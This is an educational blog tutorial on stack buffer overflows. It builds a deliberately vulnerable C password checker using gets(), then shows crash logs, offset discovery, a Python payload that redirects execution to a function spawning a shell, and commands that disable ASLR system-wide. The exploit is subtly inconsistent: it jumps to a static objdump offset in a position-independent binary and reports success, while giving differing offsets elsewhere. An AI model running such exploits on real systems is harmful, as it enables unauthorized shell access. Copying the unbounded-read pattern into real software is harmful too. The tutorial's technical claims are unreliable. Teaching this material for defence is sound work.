Understanding Buffer Overrun Exploits
25 Oct 2024
Introduction
Buffer overrun exploits (also known as buffer overflow attacks) are one of the most well-known and dangerous types of vulnerabilities in software security. These exploits take advantage of how a program manages memory—specifically, by writing more data to a buffer (an allocated block of memory) than it can safely hold. When this happens, the excess data can overwrite adjacent memory locations, potentially altering the program’s control flow or causing it to behave unpredictably.
Attackers can exploit buffer overruns to inject malicious code or manipulate the system to execute arbitrary instructions, often gaining unauthorized access to the target system. Despite being a well-studied vulnerability, buffer overflows remain relevant today, particularly in low-level languages like C and C++, which allow direct memory manipulation.
In this post, we’ll take a closer look at how buffer overrun exploits work and walk through a code example in C that demonstrates the vulnerability. By understanding the mechanics behind buffer overflows, we can also better understand how to mitigate them.
Disclaimer: The code in this article is purely for demonstration purposes. We use some intentionally unsafe techniques to set up an exploitable scenario. DO NOT use this code in production applications, ever.
Password Validator Example
In the following example, the program will ask for input from the user and validate it against a password stored on the server.
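/* headers needed by the listings in this article */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int validate_password(void);
int check_password(char *attempt);

void do_super_admin_things() {
    system("/bin/sh");
}

int main(int argc, char *argv[]) {
    if (validate_password()) {
        do_super_admin_things();
    } else {
        printf("ERROR: Bad password\n");
    }
    return 0;
}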
do_super_admin_things is our example of a privileged operation. It might be an admin shell, or something else. The point is that this program is trying to control access to that function by making sure you have the password first!
The validate_password function is responsible for getting that password in from the outside world. It prompts, and then reads from stdin. Note the use of gets().
int validate_password() {
    char password_attempt[64];

    printf("What is the password? ");
    gets(password_attempt); /* unbounded read: the deliberate flaw in this demo */

    return check_password(password_attempt);
}
Warning About gets
The use of gets() here is strongly discouraged because the function is inherently insecure. Below are notes from its man page:
BUGS Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead.
The Library Functions Manual makes it clear. The function is so bad for security that it was deprecated in the C99 standard, as per §7.26.9, and removed entirely in C11:
The gets function is obsolescent, and is deprecated.
If there’s one thing to learn from this section, it’s this: don’t use gets().
To get this code to compile, I had to relax some of the standard rules and mute certain warnings:
gcc vuln1.c -m32 -std=c89 -Wno-deprecated-declarations -fno-stack-protector -g -o vuln1
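To make the man page's advice concrete, here is a minimal Python sketch of the size-bounded behaviour that fgets() provides and gets() lacks. It is only a model, not the C library: read_line_bounded and BUFFER_SIZE are names invented for this illustration, and io.BytesIO stands in for stdin.

```python
import io

BUFFER_SIZE = 64  # same size as password_attempt in the article


def read_line_bounded(stream, buffer_size):
    """Model fgets(buf, buffer_size, stream): return at most buffer_size - 1 bytes.

    One byte is held back because C needs it for the terminating NUL.
    Reading also stops after a newline, as fgets() does.
    """
    return stream.readline(buffer_size - 1)


if __name__ == "__main__":
    # 100 bytes of input plus a newline, far more than the buffer can hold
    stdin_model = io.BytesIO(b"A" * 100 + b"\n")
    first = read_line_bounded(stdin_model, BUFFER_SIZE)
    print(len(first))               # prints 63
    print(len(stdin_model.read()))  # prints 38: the excess stays in the stream
```

The point of the model is that the caller states the buffer size, so the excess input is left unread instead of being written past the end of the buffer.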
Checking the Password
The check_password function reads a file from disk that contains the super-secret password, then compares the attempt to the correct password.
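int check_password(char *attempt) {
    char password[256];
    ssize_t read_bytes;
    int fd;

    if ((fd = open("./the-password", O_RDONLY)) < 0) {
        perror("open");
        return 0;
    }

    /* Leave room for the terminating NUL. */
    read_bytes = read(fd, password, sizeof(password) - 1);
    close(fd);
    if (read_bytes <= 0) {
        return 0; /* read error or empty file: reject every attempt */
    }
    password[read_bytes] = '\0';

    /* Strip a single trailing newline. */
    if (password[read_bytes - 1] == '\n') {
        password[read_bytes - 1] = '\0';
    }

    /* Compare the full strings so an attempt that merely starts with the password is rejected. */
    return strcmp(password, attempt) == 0;
}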
Crashes
Initially, if you provide any normal input, the program behaves as expected:
What is the password? AAAAAAAAAAAA
ERROR: Bad password
But if you push the input a bit further, exceeding the bounds of the password_attempt buffer, you can trigger a crash:
What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[1] 60406 segmentation fault (core dumped) ./vuln1
The program crashes due to a segmentation fault. Checking dmesg gives us more information:
$ dmesg | tail -n 5
[ 4442.984159] vuln1[60406]: segfault at 41414141 ip 0000000041414141 sp 00000000ff9a5670 error 14 likely on CPU 19 (core 35, socket 0)
[ 4442.984189] Code: Unable to access opcode bytes at 0x41414117.
Notice the 41414141 pattern. This is significant because it shows that the capital A’s from our input (0x41 in hexadecimal) are making their way into the instruction pointer (ip). The input we provided has overflowed into crucial parts of the stack, including the saved return address, which the CPU loads into the instruction pointer when the function returns.
You can verify that 0x41 represents ‘A’ by running the following command:
echo -e "\x41\x41\x41\x41"
AAAA
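The same check can be scripted. The sketch below pulls the addresses out of a kernel segfault line and shows the instruction pointer as the input bytes that produced it. The regular expression is written against the dmesg line quoted above and may need adjusting for other kernel versions; parse_segfault and ip_as_text are hypothetical helper names.

```python
import re
import struct

# Matches the address fields of a line such as the dmesg output quoted in the article.
SEGFAULT_RE = re.compile(r"segfault at ([0-9a-f]+) ip ([0-9a-f]+) sp ([0-9a-f]+)")


def parse_segfault(line):
    """Return (fault_address, instruction_pointer, stack_pointer) as integers."""
    match = SEGFAULT_RE.search(line)
    if match is None:
        raise ValueError("not a segfault line")
    return tuple(int(group, 16) for group in match.groups())


def ip_as_text(ip):
    """Show a 32-bit instruction pointer as the four bytes it occupied in memory."""
    return struct.pack("<I", ip).decode("ascii", errors="replace")


line = ("[ 4442.984159] vuln1[60406]: segfault at 41414141 ip 0000000041414141 "
        "sp 00000000ff9a5670 error 14 likely on CPU 19 (core 35, socket 0)")
fault, ip, sp = parse_segfault(line)
print(hex(ip), ip_as_text(ip))  # prints: 0x41414141 AAAA
```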
Controlling the Instruction Pointer
This works because the large input string is overflowing the password_attempt buffer. This buffer is a local variable in the validate_password function, and on the stack, local variables are stored just below the return address. When password_attempt overflows, the excess data overwrites the return address on the stack. Once it is overwritten, we control what address the CPU will jump to after validate_password finishes.
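A toy model can make this layout easier to picture. The Python sketch below represents the stack frame as a flat byte array: the 64-byte buffer first, then a gap, then a 4-byte return address. It is a simplification rather than a description of the real frame. In particular, GAP_SIZE is an assumed value (the real distance is measured experimentally later in this section), and make_frame, gets_model and saved_return_address are names made up for the illustration.

```python
import struct

BUFFER_SIZE = 64  # size of password_attempt in the article
GAP_SIZE = 12     # assumption: bytes between the buffer and the return address


def make_frame(return_address):
    """Build a toy frame: zeroed buffer and gap, then the little-endian return address."""
    frame = bytearray(BUFFER_SIZE + GAP_SIZE)
    frame += struct.pack("<I", return_address)
    return frame


def gets_model(frame, data):
    """Copy data plus a terminating NUL into the frame with no bounds check, as gets() does."""
    data = data + b"\x00"
    frame[0:len(data)] = data
    return frame


def saved_return_address(frame):
    """Read back the 4-byte value stored in the return-address slot."""
    start = BUFFER_SIZE + GAP_SIZE
    return struct.unpack("<I", frame[start:start + 4])[0]


frame = make_frame(0x11223344)            # placeholder return address
gets_model(frame, b"A" * 12)
print(hex(saved_return_address(frame)))   # prints 0x11223344: input fits, nothing damaged
gets_model(frame, b"A" * 80)
print(hex(saved_return_address(frame)))   # prints 0x41414141: input reached the slot
```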
Maybe we could find the address of the do_super_admin_things function and simply jump directly to it. To do this, we need to find the address. Only the name of the function is available to us in the source code; its location in the binary is fixed when the program is compiled and linked, so we need to lean on some other tools to gather this intel.
By using objdump we can take a look inside the compiled executable and get this information.
objdump -d vuln1
This will disassemble the vuln1 program and give us the location of each of the functions. We search for the function that we want (do_super_admin_things):
00001316 <do_super_admin_things>:
1316: 55 push %ebp
1317: 89 e5 mov %esp,%ebp
1319: 53 push %ebx
We find that it’s at address 00001316. We need to take note of this value as we’ll need it shortly.
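Rather than reading the listing by eye, the lookup can be scripted. The sketch below scans disassembly text for symbol header lines of the form shown above and maps each function name to its address. It assumes that header format; symbol_offsets is a hypothetical helper, and the sample text is the excerpt from this article rather than full objdump output.

```python
import re

# A symbol header looks like: 00001316 <do_super_admin_things>:
SYMBOL_RE = re.compile(r"^([0-9a-f]+) <([^>]+)>:$")


def symbol_offsets(disassembly):
    """Map each function name found in the disassembly text to its address."""
    offsets = {}
    for line in disassembly.splitlines():
        match = SYMBOL_RE.match(line.strip())
        if match:
            offsets[match.group(2)] = int(match.group(1), 16)
    return offsets


sample = """\
00001316 <do_super_admin_things>:
    1316: 55        push %ebp
    1317: 89 e5     mov %esp,%ebp
    1319: 53        push %ebx
"""
print(hex(symbol_offsets(sample)["do_super_admin_things"]))  # prints 0x1316
```

To run it against the real binary, the text could come from subprocess.run(["objdump", "-d", "vuln1"], capture_output=True, text=True).stdout.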
Now we need to find exactly where in that big group of A’s the return address gets overwritten, so that we can place our own address there. We’ve already got some inside knowledge about our buffer: it’s 64 bytes in length.
To pinpoint the spot, we need a recognisable marker in the input. We re-run the program with our 64 A’s, followed by a pattern of distinct four-byte groups:
What is the password? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFF
[1] 60406 segmentation fault (core dumped) ./vuln1
This segfaults again, but this time the input ends with BBBBCCCCDDDDEEEEFFFF after the 64 A’s. Looking at the log in dmesg now:
[ 9287.917223] vuln1[62745]: segfault at 45454545 ip 0000000045454545 sp 00000000ffa63b50 error 14 likely on CPU 18 (core 34, socket 0)
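The 45454545 tells us which part of the input is being sent in as the return address. \x45 is the E’s:
echo -e "\x45\x45\x45\x45"
EEEE
That means the bytes that end up in the instruction pointer start at the E’s: 64 bytes of buffer plus 12 bytes of padding (BBBBCCCCDDDD), which puts them at offset 76 in our input.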
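The offset arithmetic can be checked with a few lines of Python. The sketch below converts the faulting instruction pointer back into the bytes it held in memory and searches for them in the input we sent. It assumes a 32-bit little-endian target, as in this article; offset_of_ip is a hypothetical helper name.

```python
import struct


def offset_of_ip(pattern, ip):
    """Return the position in pattern of the four bytes that ended up in ip."""
    needle = struct.pack("<I", ip)  # the bytes as they were laid out in memory
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("instruction pointer bytes not found in the pattern")
    return offset


pattern = b"A" * 64 + b"BBBBCCCCDDDDEEEEFFFF"
print(offset_of_ip(pattern, 0x45454545))  # prints 76
```

This only gives a meaningful answer when the four-byte group is unique in the input, which is why the marker uses distinct letters instead of more A’s.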
Prepare the Payload
To make life easier for us, we’ll write a Python script that will generate this payload for us. Note that this is using our function address from before.
#!/usr/bin/env python3
import sys

# fill out the original buffer
payload = b"A" * 64

# extra pad to skip to where we want our instruction pointer
payload += b"BBBBCCCCDDDD"

# address of our function "do_super_admin_things", least significant byte first (little-endian)
payload += b"\x16\x13\x00\x00"

# write the raw bytes to stdout (sys.stdout.buffer bypasses text encoding)
sys.stdout.buffer.write(payload)
We can now inject this into the execution of our binary and achieve a shell:
$ (python3 payload.py; cat) | ./vuln1
ls
input payload.py the-password vuln1 vuln1.c
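We use (python3 payload.py; cat) here because of how the pipe’s file descriptors behave. If we simply piped the script’s output into the program, the pipe would close as soon as the script exited, and the new shell would read end-of-file on its stdin and quit immediately. Running cat afterwards keeps the pipe open and forwards whatever we type to the shell.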
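Returning to the payload script: writing the address bytes by hand is easy to get wrong, so one option is to let struct.pack produce the little-endian encoding. The sketch below is a parameterised variant under the same assumptions as the script above (a 32-bit target, and a return address 76 bytes into the input); build_payload is a hypothetical helper, and the address passed in must be the one the function actually occupies when the program runs.

```python
import struct
import sys


def build_payload(offset, target_address, filler=b"A"):
    """Return filler bytes up to the return-address slot, then the packed address."""
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    # "<I" packs an unsigned 32-bit integer, least significant byte first
    return filler * offset + struct.pack("<I", target_address)


if __name__ == "__main__":
    # 76 = 64-byte buffer + 12 bytes of padding; 0x1316 is the address used in the article
    sys.stdout.buffer.write(build_payload(76, 0x00001316))
```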
Static vs. Runtime Addresses
When we run our program normally, modern operating systems apply Address Space Layout Randomization (ASLR), which shifts memory locations randomly each time the program starts. ASLR is a security feature that makes it more challenging for exploits to rely on hardcoded memory addresses, because the memory layout changes every time the program is loaded.
For example, if we inspect the runtime address of do_super_admin_things in GDB, we might see something like:
(gdb) info address do_super_admin_things
Symbol "do_super_admin_things" is at 0x56556326 in a file compiled without debugging.
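This differs from the address objdump reports because the binary is a position-independent executable: objdump shows only the function’s offset within the file, 0x1326 for the build in this GDB session (offsets can shift slightly between builds), and the loader adds the base address at which the executable is mapped (e.g., 0x56555000 in this case). ASLR randomizes that base address, so the final address changes from one run to the next.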
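The relationship between the two addresses is plain addition, which the following sketch spells out using the numbers quoted above. The function names are made up for the illustration, and the base address is only valid for the GDB session shown; with ASLR active it would differ on every run.

```python
import struct


def runtime_address(load_base, static_offset):
    """Address of a symbol once the executable has been mapped at load_base."""
    return load_base + static_offset


def static_offset(load_base, address):
    """Inverse: recover the offset objdump would show from a runtime address."""
    return address - load_base


base = 0x56555000   # load base from the GDB example
offset = 0x1326     # offset quoted for the same example

address = runtime_address(base, offset)
print(hex(address))                        # prints 0x56556326
print(hex(static_offset(base, address)))   # prints 0x1326
print(struct.pack("<I", address).hex())    # prints 26635556 (little-endian byte order)
```

The last line shows the byte order in which such an address would have to appear in a payload for a 32-bit x86 target.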
Temporarily Disabling ASLR for Demonstration
To keep runtime addresses predictable, we can temporarily disable ASLR. The program then loads at the same base address on every run, so a runtime address worked out once (the base address plus the objdump offset) stays valid, which is useful for demonstration and testing purposes.
To disable ASLR on Linux, run:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
This command disables ASLR system-wide. Be sure to re-enable ASLR after testing by setting the value back to 2:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
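Because it is easy to forget the second command, a quick check of the current setting can be useful. The sketch below reads the same /proc file and translates the value into words. The descriptions follow the Linux kernel's documented meanings for 0, 1 and 2; describe_aslr and current_aslr are hypothetical helper names, and the check only applies on Linux.

```python
from pathlib import Path

ASLR_PATH = Path("/proc/sys/kernel/randomize_va_space")

ASLR_MODES = {
    0: "disabled",
    1: "conservative randomization (stack, mmap base, VDSO)",
    2: "full randomization (also the heap)",
}


def describe_aslr(raw_value):
    """Translate the text read from randomize_va_space into a description."""
    mode = int(raw_value.strip())
    return ASLR_MODES.get(mode, "unknown mode %d" % mode)


def current_aslr(path=ASLR_PATH):
    """Read and describe the system-wide ASLR setting."""
    return describe_aslr(path.read_text())


if __name__ == "__main__":
    if ASLR_PATH.exists():
        print(current_aslr())
    else:
        print("randomize_va_space not found; is this a Linux system?")
```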
Conclusion
In this post, we explored the mechanics of buffer overflow exploits, walked through a worked example in C, and demonstrated how ASLR impacts the addresses used in an exploit. By leveraging objdump, we could inspect static addresses, but we also noted how runtime address randomization, through ASLR, makes these addresses unpredictable.
Disabling ASLR temporarily gave the program a fixed load address, so the offsets reported by objdump translate into stable runtime addresses and the exploit demonstration is clearer. This also highlights why modern systems adopt ASLR: by shifting memory locations each time a program runs, ASLR makes it significantly more difficult for attackers to execute hardcoded exploits reliably.
Understanding and practicing secure coding, such as avoiding vulnerable functions like gets() and enabling stack protections, is crucial in preventing such exploits. Combined with ASLR and other modern defenses, these practices create a layered approach to security, significantly enhancing the resilience of software.
Buffer overflows remain a classic but essential area of study in software security. By thoroughly understanding their mechanisms and challenges, developers and security researchers can better protect systems from these types of attacks.